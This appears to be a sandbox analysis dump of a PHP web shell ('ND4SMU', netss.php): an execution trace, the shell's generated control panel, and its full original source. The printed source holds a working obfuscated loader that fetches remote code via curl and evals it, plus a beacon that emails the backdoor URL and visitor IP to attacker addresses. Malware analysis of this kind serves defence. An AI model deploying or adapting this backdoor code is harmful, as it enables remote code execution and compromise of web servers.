2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1084 $path = '/var/www/html/uploads/netss.php'
3 183 0 0.143466 976200 fileperms 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 1 '/var/www/html/uploads/netss.php'
3 183 1 0.143483 976232
3 183 R 33204
3 184 0 0.143496 976192 decoct 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 1 33204
3 184 1 0.143509 976264
3 184 R '100664'
3 185 0 0.143522 976224 substr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 2 '100664' -4
3 185 1 0.143536 976320
3 185 R '0664'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1085 $prem = '0664'
3 186 0 0.143560 976192 filectime 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1086 1 '/var/www/html/uploads/netss.php'
3 186 1 0.143574 976232
3 186 R 1676241948
3 187 0 0.143587 976192 date 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1086 2 'Y-m-d H:i:s' 1676241948
3 187 1 0.143618 976520
3 187 R '2023-02-12 17:45:48'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1086 $ctime = '2023-02-12 17:45:48'
3 188 0 0.143644 976192 filemtime 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1087 1 '/var/www/html/uploads/netss.php'
3 188 1 0.143658 976232
3 188 R 1676241948
3 189 0 0.143670 976192 date 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1087 2 'Y-m-d H:i:s' 1676241948
3 189 1 0.143700 976520
3 189 R '2023-02-12 17:45:48'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1087 $mtime = '2023-02-12 17:45:48'
3 190 0 0.143726 976192 filesize 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1088 1 '/var/www/html/uploads/netss.php'
3 190 1 0.143740 976232
3 190 R 2400
3 191 0 0.143752 976192 size 1 /var/www/html/uploads/netss.php(1) : eval()'d code 1088 1 2400
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 137 $array = [0 => 'B', 1 => 'K', 2 => 'M', 3 => 'G', 4 => 'T']
4 192 0 0.143781 976192 log 0 /var/www/html/uploads/netss.php(1) : eval()'d code 138 1 2400
4 192 1 0.143809 976224
4 192 R 7.783224016336
4 193 0 0.143824 976192 log 0 /var/www/html/uploads/netss.php(1) : eval()'d code 138 1 1024
4 193 1 0.143837 976224
4 193 R 6.9314718055995
4 194 0 0.143851 976192 floor 0 /var/www/html/uploads/netss.php(1) : eval()'d code 138 1 1.1228818690496
4 194 1 0.143864 976224
4 194 R 1
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 138 $floor = 1
4 195 0 0.143888 976224 floor 0 /var/www/html/uploads/netss.php(1) : eval()'d code 139 1 1
4 195 1 0.143901 976256
4 195 R 1
4 196 0 0.143913 976224 pow 0 /var/www/html/uploads/netss.php(1) : eval()'d code 139 2 1024 1
4 196 1 0.143931 976296
4 196 R 1024
4 197 0 0.143945 976224 sprintf 0 /var/www/html/uploads/netss.php(1) : eval()'d code 139 2 '%.2f K' 2.34375
4 197 1 0.143960 976608
4 197 R '2.34 K'
3 191 1 0.143974 976512
3 191 R '2.34 K'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1088 $size = '2.34 K'
3 198 0 0.143999 976640 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1090 2 'netss.php' ['%27' => '\'', '%22' => '"']
3 198 1 0.144015 976704
3 198 R 'netss.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1098 $fnum++
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1084 $path = '/var/www/html/uploads/prepend.php'
3 199 0 0.144058 976480 fileperms 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 1 '/var/www/html/uploads/prepend.php'
3 199 1 0.144075 976528
3 199 R 33261
3 200 0 0.144088 976488 decoct 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 1 33261
3 200 1 0.144101 976560
3 200 R '100755'
3 201 0 0.144114 976520 substr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 2 '100755' -4
3 201 1 0.144127 976616
3 201 R '0755'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1085 $prem = '0755'
3 202 0 0.144151 976488 filectime 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1086 1 '/var/www/html/uploads/prepend.php'
3 202 1 0.144164 976528
3 202 R 1676241948
3 203 0 0.144177 976488 date 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1086 2 'Y-m-d H:i:s' 1676241948
3 203 1 0.144208 976816
3 203 R '2023-02-12 17:45:48'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1086 $ctime = '2023-02-12 17:45:48'
3 204 0 0.144234 976488 filemtime 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1087 1 '/var/www/html/uploads/prepend.php'
3 204 1 0.144247 976528
3 204 R 1676241948
3 205 0 0.144261 976488 date 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1087 2 'Y-m-d H:i:s' 1676241948
3 205 1 0.144291 976816
3 205 R '2023-02-12 17:45:48'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1087 $mtime = '2023-02-12 17:45:48'
3 206 0 0.144316 976488 filesize 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1088 1 '/var/www/html/uploads/prepend.php'
3 206 1 0.144330 976528
3 206 R 57
3 207 0 0.144343 976488 size 1 /var/www/html/uploads/netss.php(1) : eval()'d code 1088 1 57
3 207 1 0.144357 976520
3 207 R '57 B'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1088 $size = '57 B'
3 208 0 0.144381 976360 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1090 2 'prepend.php' ['%27' => '\'', '%22' => '"']
3 208 1 0.144398 976424
3 208 R 'prepend.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1098 $fnum++
3 209 0 0.144428 974688 php_uname 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1114 0
3 209 1 0.144443 974800
3 209 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1116 GLOBALS['btujuk_cneymfvrjgepxhmtysatik'] = 'tujuanmail'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1116 GLOBALS['qodpxoez__jkfokmjzcy'] = 'x_path'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1116 GLOBALS['hc_fonvwctq_uwtdbanc__vsgzogutvagtan'] = '_SERVER'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1116 GLOBALS['jyscu_ckqiihgkd_evwia'] = 'pesan_alert'
3 210 0 0.144517 974688 ini_set 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1116 2 'output_buffering' 0
3 210 1 0.144532 974760
3 210 R FALSE
3 211 0 0.144545 974688 ini_set 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1116 2 'display_errors' 0
3 211 1 0.144560 974792
3 211 R 'Off'
3 212 0 0.144573 974688 set_time_limit 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1116 1 0
3 212 1 0.144588 974720
3 212 R FALSE
3 213 0 0.144601 974688 ini_set 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1116 2 'memory_limit' '64M'
3 213 1 0.144616 974792
3 213 R '128M'
3 214 0 0.144628 974688 header 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1116 1 'Content-Type: text/html; charset=UTF-8'
3 214 1 0.144644 974720
3 214 R NULL
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1116 $tujuanmailtujuanmail = 'logndasmu@gmail.com, ndasmuwhy@yahoo.com'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1116 $x_pathx_path = 'http://localhost/uploads/netss.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1116 $pesan_alertpesan_alert = 'fix http://localhost/uploads/netss.php :p *IP Address : [ 127.0.0.1 ]'
3 215 0 0.144705 978960 mail 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1116 4 'logndasmu@gmail.com, ndasmuwhy@yahoo.com' 'backdoor' 'fix http://localhost/uploads/netss.php :p *IP Address : [ 127.0.0.1 ]' '[ 127.0.0.1 ]'
3 215 1 0.145651 979104
3 215 R FALSE
2 11 1 0.145680 978920
1 A /var/www/html/uploads/netss.php 1 GLOBALS['btujuk_cneymfvrjgepxhmtysatik'] = 'tujuanmail'
1 A /var/www/html/uploads/netss.php 1 GLOBALS['qodpxoez__jkfokmjzcy'] = 'x_path'
1 A /var/www/html/uploads/netss.php 1 GLOBALS['hc_fonvwctq_uwtdbanc__vsgzogutvagtan'] = '_SERVER'
1 A /var/www/html/uploads/netss.php 1 GLOBALS['jyscu_ckqiihgkd_evwia'] = 'pesan_alert'
2 216 0 0.145773 711960 ini_set 0 /var/www/html/uploads/netss.php 1 2 'output_buffering' 0
2 216 1 0.145789 712032
2 216 R FALSE
2 217 0 0.145802 711960 ini_set 0 /var/www/html/uploads/netss.php 1 2 'display_errors' 0
2 217 1 0.145816 712032
2 217 R '0'
2 218 0 0.145829 711960 set_time_limit 0 /var/www/html/uploads/netss.php 1 1 0
2 218 1 0.145843 711992
2 218 R FALSE
2 219 0 0.145856 711960 ini_set 0 /var/www/html/uploads/netss.php 1 2 'memory_limit' '64M'
2 219 1 0.145869 712032
2 219 R '64M'
2 220 0 0.145882 711928 header 0 /var/www/html/uploads/netss.php 1 1 'Content-Type: text/html; charset=UTF-8'
2 220 1 0.145897 711960
2 220 R NULL
1 A /var/www/html/uploads/netss.php 1 $tujuanmailtujuanmail = 'logndasmu@gmail.com, ndasmuwhy@yahoo.com'
1 A /var/www/html/uploads/netss.php 1 $x_pathx_path = 'http://localhost/uploads/netss.php'
1 A /var/www/html/uploads/netss.php 1 $pesan_alertpesan_alert = 'fix http://localhost/uploads/netss.php :p *IP Address : [ 127.0.0.1 ]'
2 221 0 0.145954 711808 mail 0 /var/www/html/uploads/netss.php 1 4 'logndasmu@gmail.com, ndasmuwhy@yahoo.com' 'backdoor' 'fix http://localhost/uploads/netss.php :p *IP Address : [ 127.0.0.1 ]' '[ 127.0.0.1 ]'
2 221 1 0.146810 711952
2 221 R FALSE
1 3 1 0.146833 711768
0.147550 615736
TRACE END [2023-02-12 20:46:14.314379]
Generated HTML code
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="width=device-width, initial-scale=1" name="viewport"><style type="text/css">* {margin:0px;padding:0px;}body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;}a{color:#000000;text-decoration:none;vertical-align:middle;}a:hover{color:#FF0000;text-decoration:underline;}p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}input,select { vertical-align:middle; }input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}input[type=submit], input[type=button] {height:21px;}.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}.main {width:963px;margin:0 auto;padding:10px;}.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}.msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;}.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}.tables {width:100%;}.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}.tables td {background:#F9F6F4;height:19px;padding-left:2px;}.tables tr:hover td {background-color: #EEE685;}</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }function go(a,b) { b = sd(b); $('go').value = a; $('govar').value = b; if(a == 'editor') { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } $('gofrm').submit(); } function nf(a,b) { re = prompt("New name",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } } function dels(a) { if(a == 'b') { var msg = ""; $('act').value = a; } else { var msg = ""; $('act').value = 'deltree'; $('var').value = a; } if(confirm("Are you sure you want to delete? "+msg+"")) { $('frm1').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }</script><title>localhost | ND4SMU</title></head><body><div class="main"><div class="outl"><div class="toptag">::1 - Linux - whoami(osboxes) - [uid(1000) gid(1000)]</div><div class="tag"><a class="current" href="javascript:void(0);" onclick="go('file','L3Zhci93d3cvaHRtbC8=');">File Mgr</a> <a href="javascript:void(0);" onclick="go('scan','L3Zhci93d3cvaHRtbC8=');">Searcher</a> <a href="javascript:void(0);" onclick="go('antivirus','L3Zhci93d3cvaHRtbC8=');">Antivirus</a> <a href="javascript:void(0);" onclick="go('backshell','L3Zhci93d3cvaHRtbC8=');">Bind Port</a> <a href="javascript:void(0);" onclick="go('exec','L3Zhci93d3cvaHRtbC8=');">Exec CMD</a> <a href="javascript:void(0);" onclick="go('phpeval','L3Zhci93d3cvaHRtbC8=');">Exec PHP</a> <a href="javascript:void(0);" onclick="go('sql','L3Zhci93d3cvaHRtbC8=');">Exec SQL</a> <a href="javascript:void(0);" onclick="go('info','L3Zhci93d3cvaHRtbC8=');">System</a> </div><form name="gofrm" id="gofrm" method="POST"><input type="hidden" name="go" id="go" value=""><input type="hidden" name="godir" id="godir" value="/var/www/html/"><input type="hidden" name="govar" id="govar" value=""></form><div class="msgbox">=======ND4SMU=======</div><div class="actall"><form name="frm" id="frm" method="POST"><h2>Path</h2> <input type="text" name="dir" id="dir" style="width:508px;" value="/var/www/html/"> <input type="button" onclick="$('frm').submit();" style="width:50px;" value="Go"> <input type="button" onclick="cd('/var/www/html/');" style="width:68px;" value="Root dir"> <input type="button" onclick="cd('/var/www/html/');" style="width:68px;" value="Current dir"> <select onchange="cd(options[selectedIndex].value);"><option>---Special Dir---</option><option value="C:/RECYCLER/">Win-RECYCLER</option><option value="C:/$Recycle.Bin/">Win-$Recycle</option><option value="C:/Program Files/">Win-Program</option><option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option><option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动/">Win-Startup (CN)</option><option value="C:/Windows/Temp/">Win-TEMP</option><option value="/usr/local/">Linux-local</option><option value="/tmp/">Linux-tmp</option><option value="/var/tmp/">Linux-var</option><option value="/etc/ssh/">Linux-ssh</option></select></form></div><div class="actall"><input type="button" value="New file" onclick="nf('edit','newfile.php');" style="width:68px;"> <input type="button" value="New Dir" onclick="txts('Directory name','newdir','e');" style="width:68px;"> <input type="button" value="Download" onclick="txts('Download the file to the current directory','https://gitlab.com/samb1/fix_why/-/raw/main/php/proses.php','f');" style="width:68px;"> <input type="button" value="Bulk Up" onclick="go('upfiles','/var/www/html/');" style="width:68px;"> <form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data"><input type="hidden" name="dir" id="dir" value="/var/www/html/"><input type="file" name="upfile" style="width:286px;height:21px;"> <input type="button" onclick="$('upfrm').submit();" value="Upload" style="width:50px;"> Renamed to <input type="text" name="rename" style="width:128px;"></form></div><form name="frm1" id="frm1" method="POST"><table class="tables"><input type="hidden" name="dir" id="dir" value="/var/www/html/"><input type="hidden" name="act" id="act" value=""><input type="hidden" name="var" id="var" value=""><tbody><tr><th><a href="javascript:void(0);" onclick="cd('/var/www/');">Parent directory</a></th><th style="width:5%">Perm</th><th style="width:17%">Creation time</th><th style="width:17%">Last Changed</th><th style="width:8%">Size</th><th style="width:8%">Action</th></tr><tr><td><input type="checkbox" name="files[]" value="auth_log.php"><a href="javascript:void(0);" onclick="go('edit','auth_log.php');">auth_log.php</a></td><td><a href="javascript:void(0);" onclick="acts('0644','pd','auth_log.php');">0644</a></td><td>2023-02-12 17:45:41</td><td>2023-02-12 17:45:41</td><td align="right"><a href="javascript:void(0);" onclick="go('down','auth_log.php');">227 B</a></td><td><a target="_blank" href="/auth_log.php">View</a> | <a href="javascript:void(0);" onclick="acts('auth_log.php','rf','auth_log.php');">Ren</a></td></tr><tr><td><input type="checkbox" name="files[]" value="beneri.se_malware_analysis"><a href="javascript:void(0);" onclick="go('edit','beneri.se_malware_analysis');">beneri.se_malware_analysis</a></td><td><a href="javascript:void(0);" onclick="acts('0644','pd','beneri.se_malware_analysis');">0644</a></td><td>2023-02-12 17:45:40</td><td>2023-02-12 17:45:40</td><td align="right"><a href="javascript:void(0);" onclick="go('down','beneri.se_malware_analysis');">0 B</a></td><td><a target="_blank" href="/beneri.se_malware_analysis">View</a> | <a href="javascript:void(0);" onclick="acts('beneri.se_malware_analysis','rf','beneri.se_malware_analysis');">Ren</a></td></tr><tr><td><input type="checkbox" name="files[]" value="netss.php"><a href="javascript:void(0);" onclick="go('edit','netss.php');">netss.php</a></td><td><a href="javascript:void(0);" onclick="acts('0664','pd','netss.php');">0664</a></td><td>2023-02-12 17:45:40</td><td>2023-02-12 17:45:40</td><td align="right"><a href="javascript:void(0);" onclick="go('down','netss.php');">2.34 K</a></td><td><a target="_blank" href="/netss.php">View</a> | <a href="javascript:void(0);" onclick="acts('netss.php','rf','netss.php');">Ren</a></td></tr><tr><td><input type="checkbox" name="files[]" value="regid.php"><a href="javascript:void(0);" onclick="go('edit','regid.php');">regid.php</a></td><td><a href="javascript:void(0);" onclick="acts('0644','pd','regid.php');">0644</a></td><td>2023-02-12 17:45:41</td><td>2023-02-12 17:45:41</td><td align="right"><a href="javascript:void(0);" onclick="go('down','regid.php');">273 B</a></td><td><a target="_blank" href="/regid.php">View</a> | <a href="javascript:void(0);" onclick="acts('regid.php','rf','regid.php');">Ren</a></td></tr></tbody></table><div class="actall" style="text-align:left;"><input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> <input type="button" value="Copy" style="width:50px;" onclick="txts("Copy path","/var/www/html/","a");"> <input type="button" value="Delete" style="width:50px;" onclick="dels("b");"> <input type="button" value="Perm" style="width:50px;" onclick="txts("Change Permission","0666","c");"> <input type="button" value="Time" style="width:50px;" onclick="txts("Change the time","2023-02-12 17:45:41","d");"> Total dir[0] - Total file[4] - Permission[0777]</div></form><div class="footag">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br>Apache/2.4.52 (Ubuntu)</div></div></div></body></html>Original PHP code
<?php $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?><?php ${"\x47\x4cO\x42\x41\x4c\x53"}["\x62t\x75\x6a\x75k\x5fc\x6e\x65y\x6d\x66v\x72\x6a\x67e\x70x\x68m\x74\x79\x73\x61t\x69k"]="t\x75j\x75a\x6em\x61i\x6c";${"\x47L\x4fB\x41\x4cS"}["q\x6f\x64p\x78\x6fe\x7a\x5f\x5fj\x6b\x66\x6f\x6bm\x6az\x63\x79"]="x\x5fp\x61\x74h";${"\x47L\x4f\x42A\x4c\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]="_\x53E\x52\x56\x45R";${"G\x4cO\x42\x41\x4c\x53"}["j\x79s\x63u\x5f\x63\x6bq\x69i\x68g\x6bd\x5fe\x76w\x69a"]="p\x65\x73\x61n\x5fa\x6c\x65r\x74";@ini_set('output_buffering',0);@ini_set('display_errors',0);set_time_limit(0);ini_set('memory_limit','64M');header('Content-Type: text/html; charset=UTF-8');${${"G\x4cO\x42A\x4cS"}["\x62t\x75\x6a\x75k\x5fc\x6e\x65y\x6d\x66v\x72\x6a\x67e\x70x\x68m\x74\x79\x73\x61t\x69k"]}="l\x6fg\x6ed\x61s\x6du\x40g\x6da\x69\x6c.\x63\x6fm\x2c\x20n\x64a\x73\x6d\x75\x77\x68y\x40y\x61\x68o\x6f.\x63\x6f\x6d";${${"G\x4cO\x42A\x4cS"}["q\x6f\x64p\x78\x6fe\x7a\x5f\x5fj\x6b\x66\x6f\x6bm\x6az\x63\x79"]}="\x68t\x74p\x3a/\x2f".${${"G\x4c\x4f\x42\x41L\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['SERVER_NAME'].${${"\x47\x4c\x4f\x42A\x4cS"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['REQUEST_URI'];${${"\x47L\x4fB\x41\x4cS"}["j\x79s\x63u\x5f\x63\x6bq\x69i\x68g\x6bd\x5fe\x76w\x69a"]}="\x66\x69\x78\x20${${"\x47\x4cO\x42\x41L\x53"}["q\x6f\x64p\x78\x6fe\x7a\x5f\x5fj\x6b\x66\x6f\x6bm\x6az\x63\x79"]}\x20\x3a\x70\x20\x2a\x49\x50\x20\x41\x64\x64\x72\x65\x73\x73\x20\x3a\x20\x5b\x20".${${"G\x4c\x4fB\x41\x4c\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['REMOTE_ADDR']."\x20\x5d";mail(${${"G\x4c\x4f\x42\x41L\x53"}["\x62t\x75\x6a\x75k\x5fc\x6e\x65y\x6d\x66v\x72\x6a\x67e\x70x\x68m\x74\x79\x73\x61t\x69k"]},"backdoor",${${"G\x4c\x4fB\x41\x4cS"}["j\x79s\x63u\x5f\x63\x6bq\x69i\x68g\x6bd\x5fe\x76w\x69a"]},"[ ".${${"\x47\x4c\x4f\x42A\x4c\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['REMOTE_ADDR']." \x5d"); ?>